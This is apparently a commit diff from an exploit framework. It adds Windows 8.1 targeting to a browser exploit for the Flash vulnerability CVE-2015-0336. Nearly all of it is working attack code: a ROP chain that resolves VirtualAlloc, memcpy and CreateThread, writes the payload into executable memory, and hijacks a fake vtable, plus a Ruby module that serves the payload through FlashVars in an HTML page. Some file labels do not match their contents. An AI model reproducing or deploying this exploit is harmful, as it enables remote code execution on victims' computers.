Land support for Windows 8.1

Author: jvazquez-r7

data/exploits/CVE-2015-0336/msf.swf

@@ -30,12 +30,14 @@ package
         private var b64:Base64Decoder = new Base64Decoder()
         private var payload:ByteArray
         private var platform:String
+        private var os:String
         private var original_length:uint = 0
 
         public function Exploit() 
         {
             var i:uint = 0
             platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
             trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
             var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
             var pattern:RegExp = / /g;
@@ -118,8 +120,9 @@ package
                 return
             }
 
-            exploiter = new Exploiter(this, platform, payload, uv)
+            exploiter = new Exploiter(this, platform, os, payload, uv)
         }
+
     }
 }
 

external/source/exploits/CVE-2015-0336/Exploit.as

@@ -11,6 +11,7 @@ package
         private var eba:ExploitByteArray
         private var payload:ByteArray
         private var platform:String
+        private var op_system:String
         private var pos:uint
         private var byte_array_object:uint
         private var main:uint
@@ -25,11 +26,12 @@ package
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
         private var spray:Vector.<Object> = new Vector.<Object>(89698)
 
-        public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.<uint>):void
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
         {
             exploit = exp
             payload = p
             platform = pl
+            op_system = os
 
             ev = new ExploitVector(uv)
             if (!ev.is_ready()) return
@@ -133,12 +135,19 @@ package
         private function do_rop():void
         {
             Logger.log("[*] Exploiter - do_rop()")
-            if (platform == "linux")
+            if (platform == "linux") {
                 do_rop_linux()
-            else if (platform == "win")
-                do_rop_windows()
-            else
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
                 return
+            }
         }
 
         private function do_rop_windows():void
@@ -150,7 +159,6 @@ package
             var kernel32:uint = pe.module("kernel32.dll", winmm)            
             var ntdll:uint = pe.module("ntdll.dll", kernel32)
             var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
-            var winexec:uint = pe.procedure("WinExec", kernel32)
             var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
             var createthread:uint = pe.procedure("CreateThread", kernel32)
             var memcpy:uint = pe.procedure("memcpy", ntdll)
@@ -182,14 +190,14 @@ package
 
             // VirtualAlloc
             eba.write(0, memcpy)
-            eba.write(0, 0x70000000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0x4000)
             eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
             eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
 
             // memcpy
             eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x70000000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, payload_address + 8)
             eba.write(0, payload.length) 
 
@@ -198,7 +206,7 @@ package
             eba.write(0, buffer + 0x10) // return to fix things
             eba.write(0, 0)
             eba.write(0, 0)
-            eba.write(0, 0x70000000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0)
             eba.write(0, 0)
             eba.write(0, 0)
@@ -207,6 +215,73 @@ package
             exploit.toString() // call method in the fake vtable
         }
 
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
         private function do_rop_linux():void
         {
             Logger.log("[*] Exploiter - do_rop_linux()")
@@ -241,8 +316,6 @@ package
             eba.write(0, "\x5f", false)             // pop edi
             eba.write(0, "\x5e", false)             // pop esi
             eba.write(0, "\xc3", false)             // ret
-        
-//            eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false)
 
             // Put the popen parameters in memory
             eba.write(payload_address + 0x8, payload, true) // false

external/source/exploits/CVE-2015-0336/Exploiter.as

@@ -51,7 +51,8 @@ def initialize(info={})
           :arch    => ARCH_X86,
           :os_name => lambda do |os|
             os =~ OperatingSystems::Match::LINUX ||
-              os =~ OperatingSystems::Match::WINDOWS_7
+              os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
           end,
           :ua_name => lambda do |ua|
             case target.name
@@ -116,6 +117,7 @@ def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
     b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
 
     if target.name =~ /Windows/
       platform_id = 'win'
@@ -130,9 +132,9 @@ def exploit_template(cli, target_info)
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&tr=<%=trigger_hex_stream%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" Play="true"/>
     </object>
     </body>
     </html>